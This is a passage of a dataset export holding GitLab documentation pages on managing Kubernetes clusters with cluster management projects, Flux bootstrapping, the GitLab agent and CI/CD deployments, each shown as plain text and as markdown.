url
stringlengths
24
122
repo_url
stringlengths
60
156
date_extracted
stringdate
2025-08-13 00:00:00
2025-08-13 00:00:00
root
stringlengths
3
85
breadcrumbs
listlengths
1
6
filename
stringlengths
6
60
stage
stringclasses
33 values
group
stringclasses
81 values
info
stringclasses
22 values
title
stringlengths
3
110
description
stringlengths
11
359
clean_text
stringlengths
47
3.32M
rich_text
stringlengths
321
3.32M
https://docs.gitlab.com/user/management_project_template
https://gitlab.com/gitlab-org/gitlab/-/tree/master/doc/user/management_project_template.md
2025-08-13
doc/user/clusters
[ "doc", "user", "clusters" ]
management_project_template.md
Deploy
Environments
To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
Manage cluster applications
null
{{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} GitLab provides a cluster management project template, which you use to create a project. The project includes cluster applications that integrate with GitLab and extend GitLab functionality. You can use the pattern shown in the project to extend your custom cluster applications. {{< alert type="note" >}} The project template works on GitLab.com without modifications. If you're on a GitLab Self-Managed instance, you must modify the `.gitlab-ci.yml` file. {{< /alert >}} ## Use one project for the agent and your manifests If you **have not yet** used the agent to connect your cluster with GitLab: 1. [Create a project from the cluster management project template](#create-a-project-based-on-the-cluster-management-project-template). 1. [Configure the project for the agent](agent/install/_index.md). 1. In your project's settings, create an [environment variable](../../ci/variables/_index.md#for-a-project) named `$KUBE_CONTEXT` and set the value to `path/to/agent-configuration-project:your-agent-name`. 1. [Configure the files](#configure-the-project) as needed. ## Use separate projects for the agent and your manifests If you have already configured the agent and connected a cluster with GitLab: 1. [Create a project from the cluster management project template](#create-a-project-based-on-the-cluster-management-project-template). 1. In the project where you configured your agent, [grant the agent access to the new project](agent/ci_cd_workflow.md#authorize-agent-access). 1. In the new project, create an [environment variable](../../ci/variables/_index.md#for-a-project) named `$KUBE_CONTEXT` and set the value to `path/to/agent-configuration-project:your-agent-name`. 1. In the new project, [configure the files](#configure-the-project) as needed. ## Create a project based on the cluster management project template To create a project from the cluster management project template: 1. On the left sidebar, at the top, select **Create new** ({{< icon name="plus" >}}) and **New project/repository**. 1. Select **Create from template**. 1. From the list of templates, next to **GitLab Cluster Management**, select **Use template**. 1. Enter the project details. 1. Select **Create project**. 1. In the new project, [configure the files](#configure-the-project) as needed. ## Configure the project After you use the cluster management template to create a project, you can configure: - [The `.gitlab-ci.yml` file](#the-gitlab-ciyml-file). - [The main `helmfile.yml` file](#the-main-helmfileyml-file). - [The directory with built-in applications](#built-in-applications). ### The `.gitlab-ci.yml` file The `.gitlab-ci.yml` file: - Ensures you are on Helm version 3. - Deploys the enabled applications from the project. You can edit and extend the pipeline definitions. The base image used in the pipeline is built by the [cluster-applications](https://gitlab.com/gitlab-org/cluster-integration/cluster-applications) project. This image contains a set of Bash utility scripts to support [Helm v3 releases](https://helm.sh/docs/intro/using_helm/#three-big-concepts). If you are on a GitLab Self-Managed instance, you must modify the `.gitlab-ci.yml` file. Specifically, the section that starts with the comment `Automatic package upgrades` does not work on a GitLab Self-Managed instance, because the `include` refers to a GitLab.com project. If you remove everything below this comment, the pipeline succeeds. ### The main `helmfile.yml` file The template contains a [Helmfile](https://github.com/helmfile/helmfile) you can use to manage cluster applications with [Helm v3](https://helm.sh/). This file has a list of paths to other Helm files for each app. They're all commented out by default, so you must uncomment the paths for the apps that you would like to use in your cluster. By default, each `helmfile.yaml` in these sub-paths has the attribute `installed: true`. This means that, depending on the state of your cluster and Helm releases, Helmfile attempts to install or update apps every time the pipeline runs. If you change this attribute to `installed: false`, Helmfile tries to uninstall this app from your cluster. [Read more](https://helmfile.readthedocs.io/en/latest/) about how Helmfile works. ### Built-in applications The template contains an `applications` directory with a `helmfile.yaml` configured for each application in the template. The [built-in supported applications](https://gitlab.com/gitlab-org/project-templates/cluster-management/-/tree/master/applications) are: - [Cert-manager](../infrastructure/clusters/manage/management_project_applications/certmanager.md) - [GitLab Runner](../infrastructure/clusters/manage/management_project_applications/runner.md) - [Ingress](../infrastructure/clusters/manage/management_project_applications/ingress.md) - [Vault](../infrastructure/clusters/manage/management_project_applications/vault.md) Each application has an `applications/{app}/values.yaml` file. For GitLab Runner, the file is `applications/{app}/values.yaml.gotmpl`. In this file, you can define default values for your app's Helm chart. Some apps already have defaults defined.
--- stage: Deploy group: Environments info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments title: Manage cluster applications breadcrumbs: - doc - user - clusters --- {{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} GitLab provides a cluster management project template, which you use to create a project. The project includes cluster applications that integrate with GitLab and extend GitLab functionality. You can use the pattern shown in the project to extend your custom cluster applications. {{< alert type="note" >}} The project template works on GitLab.com without modifications. If you're on a GitLab Self-Managed instance, you must modify the `.gitlab-ci.yml` file. {{< /alert >}} ## Use one project for the agent and your manifests If you **have not yet** used the agent to connect your cluster with GitLab: 1. [Create a project from the cluster management project template](#create-a-project-based-on-the-cluster-management-project-template). 1. [Configure the project for the agent](agent/install/_index.md). 1. In your project's settings, create an [environment variable](../../ci/variables/_index.md#for-a-project) named `$KUBE_CONTEXT` and set the value to `path/to/agent-configuration-project:your-agent-name`. 1. [Configure the files](#configure-the-project) as needed. ## Use separate projects for the agent and your manifests If you have already configured the agent and connected a cluster with GitLab: 1. [Create a project from the cluster management project template](#create-a-project-based-on-the-cluster-management-project-template). 1. In the project where you configured your agent, [grant the agent access to the new project](agent/ci_cd_workflow.md#authorize-agent-access). 1. In the new project, create an [environment variable](../../ci/variables/_index.md#for-a-project) named `$KUBE_CONTEXT` and set the value to `path/to/agent-configuration-project:your-agent-name`. 1. In the new project, [configure the files](#configure-the-project) as needed. ## Create a project based on the cluster management project template To create a project from the cluster management project template: 1. On the left sidebar, at the top, select **Create new** ({{< icon name="plus" >}}) and **New project/repository**. 1. Select **Create from template**. 1. From the list of templates, next to **GitLab Cluster Management**, select **Use template**. 1. Enter the project details. 1. Select **Create project**. 1. In the new project, [configure the files](#configure-the-project) as needed. ## Configure the project After you use the cluster management template to create a project, you can configure: - [The `.gitlab-ci.yml` file](#the-gitlab-ciyml-file). - [The main `helmfile.yml` file](#the-main-helmfileyml-file). - [The directory with built-in applications](#built-in-applications). ### The `.gitlab-ci.yml` file The `.gitlab-ci.yml` file: - Ensures you are on Helm version 3. - Deploys the enabled applications from the project. You can edit and extend the pipeline definitions. The base image used in the pipeline is built by the [cluster-applications](https://gitlab.com/gitlab-org/cluster-integration/cluster-applications) project. This image contains a set of Bash utility scripts to support [Helm v3 releases](https://helm.sh/docs/intro/using_helm/#three-big-concepts). If you are on a GitLab Self-Managed instance, you must modify the `.gitlab-ci.yml` file. Specifically, the section that starts with the comment `Automatic package upgrades` does not work on a GitLab Self-Managed instance, because the `include` refers to a GitLab.com project. If you remove everything below this comment, the pipeline succeeds. ### The main `helmfile.yml` file The template contains a [Helmfile](https://github.com/helmfile/helmfile) you can use to manage cluster applications with [Helm v3](https://helm.sh/). This file has a list of paths to other Helm files for each app. They're all commented out by default, so you must uncomment the paths for the apps that you would like to use in your cluster. By default, each `helmfile.yaml` in these sub-paths has the attribute `installed: true`. This means that, depending on the state of your cluster and Helm releases, Helmfile attempts to install or update apps every time the pipeline runs. If you change this attribute to `installed: false`, Helmfile tries to uninstall this app from your cluster. [Read more](https://helmfile.readthedocs.io/en/latest/) about how Helmfile works. ### Built-in applications The template contains an `applications` directory with a `helmfile.yaml` configured for each application in the template. The [built-in supported applications](https://gitlab.com/gitlab-org/project-templates/cluster-management/-/tree/master/applications) are: - [Cert-manager](../infrastructure/clusters/manage/management_project_applications/certmanager.md) - [GitLab Runner](../infrastructure/clusters/manage/management_project_applications/runner.md) - [Ingress](../infrastructure/clusters/manage/management_project_applications/ingress.md) - [Vault](../infrastructure/clusters/manage/management_project_applications/vault.md) Each application has an `applications/{app}/values.yaml` file. For GitLab Runner, the file is `applications/{app}/values.yaml.gotmpl`. In this file, you can define default values for your app's Helm chart. Some apps already have defaults defined.
https://docs.gitlab.com/user/management_project
https://gitlab.com/gitlab-org/gitlab/-/tree/master/doc/user/management_project.md
2025-08-13
doc/user/clusters
[ "doc", "user", "clusters" ]
management_project.md
Deploy
Environments
To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
Cluster management project (deprecated)
null
{{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} {{< history >}} - [Disabled on GitLab Self-Managed](https://gitlab.com/gitlab-org/gitlab/-/issues/353410) in GitLab 15.0. {{< /history >}} {{< alert type="warning" >}} The cluster management project was [deprecated](https://gitlab.com/groups/gitlab-org/configure/-/epics/8) in GitLab 14.5. To manage cluster applications, use the [GitLab agent for Kubernetes](agent/_index.md) with the [Cluster Management Project Template](management_project_template.md). {{< /alert >}} {{< alert type="flag" >}} On GitLab Self-Managed, by default this feature is not available. To make it available, an administrator can [enable the feature flag](../../administration/feature_flags/_index.md) named `certificate_based_clusters`. {{< /alert >}} A project can be designated as the management project for a cluster. A management project can be used to run deployment jobs with Kubernetes [`cluster-admin`](https://kubernetes.io/docs/reference/access-authn-authz/rbac/#user-facing-roles) privileges. This can be useful for: - Creating pipelines to install cluster-wide applications into your cluster, see [management project template](management_project_template.md) for details. - Any jobs that require `cluster-admin` privileges. ## Permissions Only the management project receives `cluster-admin` privileges. All other projects continue to receive [namespace scoped `edit` level privileges](../project/clusters/cluster_access.md#rbac-cluster-resources). Management projects are restricted to the following: - For project-level clusters, the management project must be in the same namespace (or descendants) as the cluster's project. - For group-level clusters, the management project must be in the same group (or descendants) as the cluster's group. - For instance-level clusters, there are no such restrictions. ## How to create and configure a cluster management project To use a cluster management project to manage your cluster: 1. Create a new project to serve as the cluster management project for your cluster. 1. [Associate the cluster with the management project](#associate-the-cluster-management-project-with-the-cluster). 1. [Configure your cluster's pipelines](#configuring-your-pipeline). 1. [Set the environment scope](#setting-the-environment-scope). ### Associate the cluster management project with the cluster To associate a cluster management project with your cluster: 1. Go to the appropriate configuration page. For a: - [Project-level cluster](../project/clusters/_index.md), go to your project's **Operate > Kubernetes clusters** page. - [Group-level cluster](../group/clusters/_index.md), go to your group's **Kubernetes** page. - [Instance-level cluster](../instance/clusters/_index.md): 1. On the left sidebar, at the bottom, select **Admin**. 1. Select **Kubernetes**. 1. Expand **Advanced settings**. 1. From the **Cluster management project** dropdown list, select the cluster management project you created in the previous step. ### Configuring your pipeline After designating a project as the management project for the cluster, add a `.gitlab-ci.yml` file in that project. For example: ```yaml configure cluster: stage: deploy script: kubectl get namespaces environment: name: production ``` ### Setting the environment scope [Environment scopes](../project/clusters/multiple_kubernetes_clusters.md#setting-the-environment-scope) are usable when associating multiple clusters to the same management project. Each scope can only be used by a single cluster for a management project. For example, the following Kubernetes clusters are associated to a management project: | Cluster | Environment scope | | ----------- | ----------------- | | Development | `*` | | Staging | `staging` | | Production | `production` | The environments set in the `.gitlab-ci.yml` file deploy to the Development, Staging, and Production cluster. ```yaml stages: - deploy configure development cluster: stage: deploy script: kubectl get namespaces environment: name: development configure staging cluster: stage: deploy script: kubectl get namespaces environment: name: staging configure production cluster: stage: deploy script: kubectl get namespaces environment: name: production ```
--- stage: Deploy group: Environments info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments title: Cluster management project (deprecated) breadcrumbs: - doc - user - clusters --- {{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} {{< history >}} - [Disabled on GitLab Self-Managed](https://gitlab.com/gitlab-org/gitlab/-/issues/353410) in GitLab 15.0. {{< /history >}} {{< alert type="warning" >}} The cluster management project was [deprecated](https://gitlab.com/groups/gitlab-org/configure/-/epics/8) in GitLab 14.5. To manage cluster applications, use the [GitLab agent for Kubernetes](agent/_index.md) with the [Cluster Management Project Template](management_project_template.md). {{< /alert >}} {{< alert type="flag" >}} On GitLab Self-Managed, by default this feature is not available. To make it available, an administrator can [enable the feature flag](../../administration/feature_flags/_index.md) named `certificate_based_clusters`. {{< /alert >}} A project can be designated as the management project for a cluster. A management project can be used to run deployment jobs with Kubernetes [`cluster-admin`](https://kubernetes.io/docs/reference/access-authn-authz/rbac/#user-facing-roles) privileges. This can be useful for: - Creating pipelines to install cluster-wide applications into your cluster, see [management project template](management_project_template.md) for details. - Any jobs that require `cluster-admin` privileges. ## Permissions Only the management project receives `cluster-admin` privileges. All other projects continue to receive [namespace scoped `edit` level privileges](../project/clusters/cluster_access.md#rbac-cluster-resources). Management projects are restricted to the following: - For project-level clusters, the management project must be in the same namespace (or descendants) as the cluster's project. - For group-level clusters, the management project must be in the same group (or descendants) as the cluster's group. - For instance-level clusters, there are no such restrictions. ## How to create and configure a cluster management project To use a cluster management project to manage your cluster: 1. Create a new project to serve as the cluster management project for your cluster. 1. [Associate the cluster with the management project](#associate-the-cluster-management-project-with-the-cluster). 1. [Configure your cluster's pipelines](#configuring-your-pipeline). 1. [Set the environment scope](#setting-the-environment-scope). ### Associate the cluster management project with the cluster To associate a cluster management project with your cluster: 1. Go to the appropriate configuration page. For a: - [Project-level cluster](../project/clusters/_index.md), go to your project's **Operate > Kubernetes clusters** page. - [Group-level cluster](../group/clusters/_index.md), go to your group's **Kubernetes** page. - [Instance-level cluster](../instance/clusters/_index.md): 1. On the left sidebar, at the bottom, select **Admin**. 1. Select **Kubernetes**. 1. Expand **Advanced settings**. 1. From the **Cluster management project** dropdown list, select the cluster management project you created in the previous step. ### Configuring your pipeline After designating a project as the management project for the cluster, add a `.gitlab-ci.yml` file in that project. For example: ```yaml configure cluster: stage: deploy script: kubectl get namespaces environment: name: production ``` ### Setting the environment scope [Environment scopes](../project/clusters/multiple_kubernetes_clusters.md#setting-the-environment-scope) are usable when associating multiple clusters to the same management project. Each scope can only be used by a single cluster for a management project. For example, the following Kubernetes clusters are associated to a management project: | Cluster | Environment scope | | ----------- | ----------------- | | Development | `*` | | Staging | `staging` | | Production | `production` | The environments set in the `.gitlab-ci.yml` file deploy to the Development, Staging, and Production cluster. ```yaml stages: - deploy configure development cluster: stage: deploy script: kubectl get namespaces environment: name: development configure staging cluster: stage: deploy script: kubectl get namespaces environment: name: staging configure production cluster: stage: deploy script: kubectl get namespaces environment: name: production ```
https://docs.gitlab.com/user/clusters/create
https://gitlab.com/gitlab-org/gitlab/-/tree/master/doc/user/clusters/_index.md
2025-08-13
doc/user/clusters/create
[ "doc", "user", "clusters", "create" ]
_index.md
Deploy
Environments
To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
Create Kubernetes clusters
Amazon EKS, Azure AKS, Google GKE, and Civo.
You can use Infrastructure as Code (IaC) to create clusters on cloud providers. You connect the clusters to GitLab by using the agent for Kubernetes. - [Create a cluster on Google GKE](../../infrastructure/clusters/connect/new_gke_cluster.md) - [Create a cluster on Amazon EKS](../../infrastructure/clusters/connect/new_eks_cluster.md) - [Create a cluster on Azure AKS](../../infrastructure/clusters/connect/new_aks_cluster.md) - [Create a cluster on Civo](../../infrastructure/clusters/connect/new_civo_cluster.md)
--- stage: Deploy group: Environments info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments title: Create Kubernetes clusters description: Amazon EKS, Azure AKS, Google GKE, and Civo. breadcrumbs: - doc - user - clusters - create --- You can use Infrastructure as Code (IaC) to create clusters on cloud providers. You connect the clusters to GitLab by using the agent for Kubernetes. - [Create a cluster on Google GKE](../../infrastructure/clusters/connect/new_gke_cluster.md) - [Create a cluster on Amazon EKS](../../infrastructure/clusters/connect/new_eks_cluster.md) - [Create a cluster on Azure AKS](../../infrastructure/clusters/connect/new_aks_cluster.md) - [Create a cluster on Civo](../../infrastructure/clusters/connect/new_civo_cluster.md)
https://docs.gitlab.com/user/clusters/getting_started
https://gitlab.com/gitlab-org/gitlab/-/tree/master/doc/user/clusters/getting_started.md
2025-08-13
doc/user/clusters/agent
[ "doc", "user", "clusters", "agent" ]
getting_started.md
Deploy
Environments
To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
Get started connecting a Kubernetes cluster to GitLab
null
This page guides you through setting up a basic Kubernetes integration in a single project. If you're new to the GitLab agent for Kubernetes, pull-based deployment, or Flux, you should start here. When you finish, you will be able to: - View the status of your Kubernetes cluster with a real-time Kubernetes dashboard. - Deploy updates to your cluster with Flux. - Deploy updates to your cluster with GitLab CI/CD. ## Before you begin Make sure you have the following before you complete this tutorial: - A Kubernetes cluster that you can access locally with `kubectl`. To see what versions of Kubernetes GitLab supports, see [Supported Kubernetes versions for GitLab features](_index.md#supported-kubernetes-versions-for-gitlab-features). You can check that everything is properly configured by running: ```shell kubectl cluster-info ``` ## Install and configure Flux [Flux](https://fluxcd.io/flux/) is the recommended tool for GitOps deployments (also called pull-based deployments). Flux is a matured CNCF project. To install Flux: - Complete the steps in [Install the Flux CLI](https://fluxcd.io/flux/installation/#install-the-flux-cli) in the Flux documentation. Check that the Flux CLI is properly installed by running: ```shell flux -v ``` ### Create a personal access token To authenticate with the Flux CLI, create a personal access token with the `api` scope: 1. On the left sidebar, select your avatar. 1. Select **Edit profile**. 1. On the left sidebar, select **Access tokens**. 1. Enter a name and optional expiry date for the token. 1. Select the `api` scope. 1. Select **Create personal access token**. You can also use a [project](../../project/settings/project_access_tokens.md) or [group access token](../../group/settings/group_access_tokens.md) with the `api` scope and the `maintainer` role. ### Bootstrap Flux In this section, you'll bootstrap Flux into an empty GitLab repository with the [`flux bootstrap`](https://fluxcd.io/flux/installation/bootstrap/gitlab/) command. To bootstrap a Flux installation: - Run the `flux bootstrap gitlab` command. For example: ```shell flux bootstrap gitlab \ --hostname=gitlab.example.org \ --owner=my-group/optional-subgroup \ --repository=my-repository \ --branch=main \ --path=clusters/testing \ --deploy-token-auth ``` The arguments of `bootstrap` are: | Argument | Description | |--------------|-------------| |`hostname` | Hostname of your GitLab instance. | |`owner` | GitLab group containing the Flux repository. | |`repository` | GitLab project containing the Flux repository. | |`branch` | Git branch the changes are committed to. | |`path` | File path to a folder where the Flux configuration is stored. | The bootstrap script does the following: 1. Creates a deploy token and saves it as a Kubernetes `secret`. 1. Creates an empty GitLab project, if the project specified by the `--repository` argument doesn't exist. 1. Generates Flux definition files for your project in a folder specified by the `--path` argument. 1. Commits the definition files to the branch specified by the `--branch` argument. 1. Applies the definition files to your cluster. After you run the script, Flux will be ready to manage itself and any other resources you add to the GitLab project and path. The rest of this tutorial assumes your path is `clusters/testing`, and your project is under `my-group/optional-subgroup/my-repository`. ## Set up the agent connection To connect your clusters, you need to install the GitLab agent for Kubernetes. You can do this by bootstrapping the agent with the GitLab CLI (`glab`). 1. [Install the GitLab CLI](https://gitlab.com/gitlab-org/cli/#installation). To check that the GitLab CLI is available, run ```shell glab version ``` 1. [Authenticate `glab`](https://gitlab.com/gitlab-org/cli/#installation) to your GitLab instance. 1. In the repository where you bootstrapped Flux, run the `glab cluster agent bootstrap` command: ```shell glab cluster agent bootstrap --manifest-path clusters/testing testing ``` By default, the command: 1. Registers the agent with `testing` as the name. 1. Configures the agent. 1. Configures an environment called `testing` with a dashboard for the agent. 1. Creates an agent token. 1. In the cluster, creates a Kubernetes secret with the agent token. 1. Commits the Flux Helm resources to the Git repository. 1. Triggers a Flux reconciliation. For more information about configuring the agent, see [Installing the agent for Kubernetes](install/_index.md). ## Check out the dashboard for Kubernetes The `glab cluster agent bootstrap` created an environment within GitLab and [configured a dashboard](../../../ci/environments/kubernetes_dashboard.md). To view your dashboard: 1. On the left sidebar, select **Search or go to** and find your project. 1. Select **Operate > Environments**. 1. Select your environment. For example, `flux-system/gitlab-agent`. 1. Select the **Kubernetes overview** tab. ## Secure the deployment {{< details >}} - Tier: Premium, Ultimate {{< /details >}} So far, we've deployed an agent using the `.gitlab/agents/testing/config.yaml` file. This configuration enables user access using the service account configured for the agent deployment. User access is used by the dashboard for Kubernetes, and for local access. To keep your deployments secure, you should change this setup to impersonate a GitLab user. In this case, you can manage your access to cluster resources through regular Kubernetes role-based access control (RBAC). To enable user impersonation: 1. In your `.gitlab/agents/testing/config.yaml` file, replace `user_access.access_as.agent: {}` with `user_access.access_as.user: {}`. 1. Go to the configured dashboard for Kubernetes. If access is restricted, the dashboard displays an error message. 1. Add the following code to `clusters/testing/gitlab-user-read.yaml`: ```yaml apiVersion: rbac.authorization.k8s.io/v1 kind: ClusterRoleBinding metadata: name: gitlab-user-view roleRef: name: view kind: ClusterRole apiGroup: rbac.authorization.k8s.io subjects: - name: gitlab:user kind: Group ``` 1. Wait a few seconds to allow Flux to apply the added manifest, then check the dashboard for Kubernetes again. The dashboard should be back to normal, thanks to the deployed cluster role binding that grants read access to all GitLab users. For more information about user access, see [Grant users Kubernetes access](user_access.md). ## Keep everything up to date You might need to upgrade Flux and `agentk` after installation. To do this: - Rerun the `flux bootstrap gitlab` and `glab cluster agent bootstrap` commands. ## Next steps You can deploy directly to your cluster from the project where you registered the agent and stored your Flux manifests. The agent is designed to support multi-tenancy, and you can scale your configuration to other projects and groups with the configured agent and Flux installation. Consider working through the follow-up tutorial, [Get started deploying to Kubernetes](getting_started_deployments.md). To learn more about using Kubernetes with GitLab, see: - [Best practices for using the GitLab integration with Kubernetes](enterprise_considerations.md) - Using the agent for [operational container scanning](vulnerabilities.md) - Providing [remote workspaces](../../workspace/_index.md) for your engineers
--- stage: Deploy group: Environments info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments title: Get started connecting a Kubernetes cluster to GitLab breadcrumbs: - doc - user - clusters - agent --- This page guides you through setting up a basic Kubernetes integration in a single project. If you're new to the GitLab agent for Kubernetes, pull-based deployment, or Flux, you should start here. When you finish, you will be able to: - View the status of your Kubernetes cluster with a real-time Kubernetes dashboard. - Deploy updates to your cluster with Flux. - Deploy updates to your cluster with GitLab CI/CD. ## Before you begin Make sure you have the following before you complete this tutorial: - A Kubernetes cluster that you can access locally with `kubectl`. To see what versions of Kubernetes GitLab supports, see [Supported Kubernetes versions for GitLab features](_index.md#supported-kubernetes-versions-for-gitlab-features). You can check that everything is properly configured by running: ```shell kubectl cluster-info ``` ## Install and configure Flux [Flux](https://fluxcd.io/flux/) is the recommended tool for GitOps deployments (also called pull-based deployments). Flux is a matured CNCF project. To install Flux: - Complete the steps in [Install the Flux CLI](https://fluxcd.io/flux/installation/#install-the-flux-cli) in the Flux documentation. Check that the Flux CLI is properly installed by running: ```shell flux -v ``` ### Create a personal access token To authenticate with the Flux CLI, create a personal access token with the `api` scope: 1. On the left sidebar, select your avatar. 1. Select **Edit profile**. 1. On the left sidebar, select **Access tokens**. 1. Enter a name and optional expiry date for the token. 1. Select the `api` scope. 1. Select **Create personal access token**. You can also use a [project](../../project/settings/project_access_tokens.md) or [group access token](../../group/settings/group_access_tokens.md) with the `api` scope and the `maintainer` role. ### Bootstrap Flux In this section, you'll bootstrap Flux into an empty GitLab repository with the [`flux bootstrap`](https://fluxcd.io/flux/installation/bootstrap/gitlab/) command. To bootstrap a Flux installation: - Run the `flux bootstrap gitlab` command. For example: ```shell flux bootstrap gitlab \ --hostname=gitlab.example.org \ --owner=my-group/optional-subgroup \ --repository=my-repository \ --branch=main \ --path=clusters/testing \ --deploy-token-auth ``` The arguments of `bootstrap` are: | Argument | Description | |--------------|-------------| |`hostname` | Hostname of your GitLab instance. | |`owner` | GitLab group containing the Flux repository. | |`repository` | GitLab project containing the Flux repository. | |`branch` | Git branch the changes are committed to. | |`path` | File path to a folder where the Flux configuration is stored. | The bootstrap script does the following: 1. Creates a deploy token and saves it as a Kubernetes `secret`. 1. Creates an empty GitLab project, if the project specified by the `--repository` argument doesn't exist. 1. Generates Flux definition files for your project in a folder specified by the `--path` argument. 1. Commits the definition files to the branch specified by the `--branch` argument. 1. Applies the definition files to your cluster. After you run the script, Flux will be ready to manage itself and any other resources you add to the GitLab project and path. The rest of this tutorial assumes your path is `clusters/testing`, and your project is under `my-group/optional-subgroup/my-repository`. ## Set up the agent connection To connect your clusters, you need to install the GitLab agent for Kubernetes. You can do this by bootstrapping the agent with the GitLab CLI (`glab`). 1. [Install the GitLab CLI](https://gitlab.com/gitlab-org/cli/#installation). To check that the GitLab CLI is available, run ```shell glab version ``` 1. [Authenticate `glab`](https://gitlab.com/gitlab-org/cli/#installation) to your GitLab instance. 1. In the repository where you bootstrapped Flux, run the `glab cluster agent bootstrap` command: ```shell glab cluster agent bootstrap --manifest-path clusters/testing testing ``` By default, the command: 1. Registers the agent with `testing` as the name. 1. Configures the agent. 1. Configures an environment called `testing` with a dashboard for the agent. 1. Creates an agent token. 1. In the cluster, creates a Kubernetes secret with the agent token. 1. Commits the Flux Helm resources to the Git repository. 1. Triggers a Flux reconciliation. For more information about configuring the agent, see [Installing the agent for Kubernetes](install/_index.md). ## Check out the dashboard for Kubernetes The `glab cluster agent bootstrap` created an environment within GitLab and [configured a dashboard](../../../ci/environments/kubernetes_dashboard.md). To view your dashboard: 1. On the left sidebar, select **Search or go to** and find your project. 1. Select **Operate > Environments**. 1. Select your environment. For example, `flux-system/gitlab-agent`. 1. Select the **Kubernetes overview** tab. ## Secure the deployment {{< details >}} - Tier: Premium, Ultimate {{< /details >}} So far, we've deployed an agent using the `.gitlab/agents/testing/config.yaml` file. This configuration enables user access using the service account configured for the agent deployment. User access is used by the dashboard for Kubernetes, and for local access. To keep your deployments secure, you should change this setup to impersonate a GitLab user. In this case, you can manage your access to cluster resources through regular Kubernetes role-based access control (RBAC). To enable user impersonation: 1. In your `.gitlab/agents/testing/config.yaml` file, replace `user_access.access_as.agent: {}` with `user_access.access_as.user: {}`. 1. Go to the configured dashboard for Kubernetes. If access is restricted, the dashboard displays an error message. 1. Add the following code to `clusters/testing/gitlab-user-read.yaml`: ```yaml apiVersion: rbac.authorization.k8s.io/v1 kind: ClusterRoleBinding metadata: name: gitlab-user-view roleRef: name: view kind: ClusterRole apiGroup: rbac.authorization.k8s.io subjects: - name: gitlab:user kind: Group ``` 1. Wait a few seconds to allow Flux to apply the added manifest, then check the dashboard for Kubernetes again. The dashboard should be back to normal, thanks to the deployed cluster role binding that grants read access to all GitLab users. For more information about user access, see [Grant users Kubernetes access](user_access.md). ## Keep everything up to date You might need to upgrade Flux and `agentk` after installation. To do this: - Rerun the `flux bootstrap gitlab` and `glab cluster agent bootstrap` commands. ## Next steps You can deploy directly to your cluster from the project where you registered the agent and stored your Flux manifests. The agent is designed to support multi-tenancy, and you can scale your configuration to other projects and groups with the configured agent and Flux installation. Consider working through the follow-up tutorial, [Get started deploying to Kubernetes](getting_started_deployments.md). To learn more about using Kubernetes with GitLab, see: - [Best practices for using the GitLab integration with Kubernetes](enterprise_considerations.md) - Using the agent for [operational container scanning](vulnerabilities.md) - Providing [remote workspaces](../../workspace/_index.md) for your engineers
https://docs.gitlab.com/user/clusters/getting_started_deployments
https://gitlab.com/gitlab-org/gitlab/-/tree/master/doc/user/clusters/getting_started_deployments.md
2025-08-13
doc/user/clusters/agent
[ "doc", "user", "clusters", "agent" ]
getting_started_deployments.md
Deploy
Environments
To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
Get started deploying to Kubernetes
null
This page introduces you to deploying to Kubernetes using methods supported by GitLab. In the end, you will understand: - How to deploy with Flux - How to deploy or run commands against your cluster from GitLab CI/CD pipelines - How to combine Flux and GitLab CI/CD for the best outcome ## Before you begin This tutorial builds on the project you created in [Get started connecting a Kubernetes cluster to GitLab](getting_started.md). You'll use the same project you created in that tutorial. However, you can use any project with a connected Kubernetes cluster and a bootstrapped Flux installation. ## Run commands against your cluster from GitLab CI/CD The agent for Kubernetes [integrates with GitLab CI/CD pipelines](ci_cd_workflow.md). You can use CI/CD to run commands like `kubectl apply` and `helm upgrade` against your cluster in a secure and scalable way. In this section, you'll use the GitLab pipeline integration to create a secret in the cluster and use it to access the GitLab container registry. The rest of this tutorial will use the deployed secret. 1. [Create a deploy token](../../project/deploy_tokens/_index.md#create-a-deploy-token) with the `read_registry` scope. 1. Save your deploy token and username as CI/CD variables called `CONTAINER_REGISTRY_ACCESS_TOKEN` and `CONTAINER_REGISTRY_ACCESS_USERNAME`. - For both variables, set the environment to `container-registry-secret*`. - For `CONTAINER_REGISTRY_ACCESS_TOKEN`: - [Mask the variable](../../../ci/variables/_index.md#mask-a-cicd-variable). - [Protect the variable](../../../ci/variables/_index.md#protect-a-cicd-variable). 1. Add the following snippet to your `.gitlab-ci.yml` file, and update both `AGENT_KUBECONTEXT` variables to match your project's path: ```yaml stages: - setup - deploy - stop create-registry-secret: stage: setup image: "portainer/kubectl-shell:latest" variables: AGENT_KUBECONTEXT: my-group/optional-subgroup/my-repository:testing before_script: # The available agents are automatically injected into the runner environment # We need to select the agent to use - kubectl config use-context $AGENT_KUBECONTEXT script: - kubectl delete secret gitlab-registry-auth -n flux-system --ignore-not-found - kubectl create secret docker-registry gitlab-registry-auth -n flux-system --docker-password="${CONTAINER_REGISTRY_ACCESS_TOKEN}" --docker-username="${CONTAINER_REGISTRY_ACCESS_USERNAME}" --docker-server="${CI_REGISTRY}" environment: name: container-registry-secret on_stop: delete-registry-secret delete-registry-secret: stage: stop image: "" variables: AGENT_KUBECONTEXT: my-group/optional-subgroup/my-repository:testing before_script: # The available agents are automatically injected into the runner 